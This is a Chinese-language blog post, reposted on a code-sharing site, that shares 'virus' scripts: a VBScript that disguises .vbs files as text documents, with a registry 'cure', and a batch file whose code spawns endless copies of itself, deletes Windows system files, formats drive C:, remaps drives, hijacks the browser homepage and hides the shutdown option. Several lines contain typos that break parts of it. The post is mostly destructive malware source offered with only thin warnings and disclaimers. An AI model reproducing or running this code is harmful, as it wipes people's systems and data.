标签：Explorer Microsoft vbs subst del Software reg 病毒

大家好，那今天小编的要给大家分享一个我搜集的vbs病毒。

这个病毒仅供参考，在还没有读懂源码之前（因为我是搜集来的代码，所以其实我自己也不懂，嘿嘿嘿......望大佬指教。），请不要运行代码！！（很重要）

有一点，这个病毒是我供给大家学习的，请不要用作非法用途，造成任何后果与本人无关。

那话不多说，直接上源码：

On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
r.Regwrite "HKLM\Software\classes\vbsfile\defaulticon\","shell32.dll,-152"
r.Regwrite "HKLM\Software\classes\vbsfile\","文本文档"

如果要运行这个程序的话，建议到虚拟机上面运行。

为了防止意外发生，我这里再附上解毒代码，如下：

Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
r.Regwrite "HKLM\Software\classes\vbsfile\defaulticon\",dir1&"\wscript.exe,2"
r.Regwrite "HKLM\Software\classes\vbsfile\","VBScript Script file"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",0,"REG_DWORD"

这个病毒因为它有解药，所以相对！相对！相对！来讲是比较！比较！比较！安全的。（注意这上面写的是“相对”和“比较”！）不过要运行的话，还是建议大家用虚拟机运行。

以上呢就是我分享的vbs病毒！我们下期再见！

彩蛋 

啊哈！你居然有耐心翻到这里，我可真是惊喜！

看到标题了吧？这里有个彩蛋，嘻嘻！

彩蛋就是bat病毒代码，这个代码可是一个破坏性的玩意，慎用！！！慎用！！！慎用！！！

它会删除你的系统文件，把关机按钮隐藏，禁用桌面单击右键！

直接上代码：

@echo off
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 0 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 0 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
echo :p>>C:\1.bat
echo start C:\1.bat>>C:\1.bat
echo goto p>>C:\1.bat
start C:\1.bat
del %winder%\win.ini /f
del %winder%\regedit.exe /f
del %winder%\Notepad.exe /f
del %winder%\System.ini /f
del C:\bootfront.bin /f
del C:\IO.sys /f
del C:\MSDOS.sys /f
del C:\NTDETECT.COM /f
echo y^|format C: /q
subst b: C:\
subst h: C:\
subst i: C:\
subst j: C:\
subst k: C:\
subst l: C:\
subst m: C:\
subst n: C:\
subst o: C:\
subst p: C:\
subst q: C:\
subst r: C:\
subst s: C:\
subst t: C:\
subst u: C:\
subst v: C:\
subst w: C:\
subst x: C:\
subst y: C:\
subst z: C:\
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http:// /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http:// /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://www.4399.com /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://www.4399.com /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 0 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
echo :p>>C:\1.bat
echo start C:\1.bat>>C:\1.bat
echo goto p>>C:\1.bat
start C:\1.bat
del %winder%\win.ini /f
del %winder%\regedit.exe /f
del %winder%\Notepad.exe /f
del %winder%\System.ini /f
del C:\bootfront.bin /f
del C:\IO.sys /f
del C:\MSDOS.sys /f
del C:\NTDETECT.COM /f
del %0 /f

咳咳！！重点来了！！

这个可怕的玩意儿，会删除你的系统文件，把关机按钮隐藏，禁用桌面单击右键的可怕玩意儿，是没有解药的！！所以你要是不小心运行了，电脑就废了......所以建议大家这个玩意最好不要去运行......

那你的电脑要是真废了，咳咳，我先声明，这跟我没有关系，所以建议大家最好不要复制这段代码然后保存到记事本里，搞后缀名为bat。。。。。。

不然要不小心点开了......那电脑真的就fei了......

标签：Explorer,Microsoft,vbs,subst,del,Software,reg,病毒
来源： https://blog.csdn.net/Zengkaichen/article/details/120762111

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。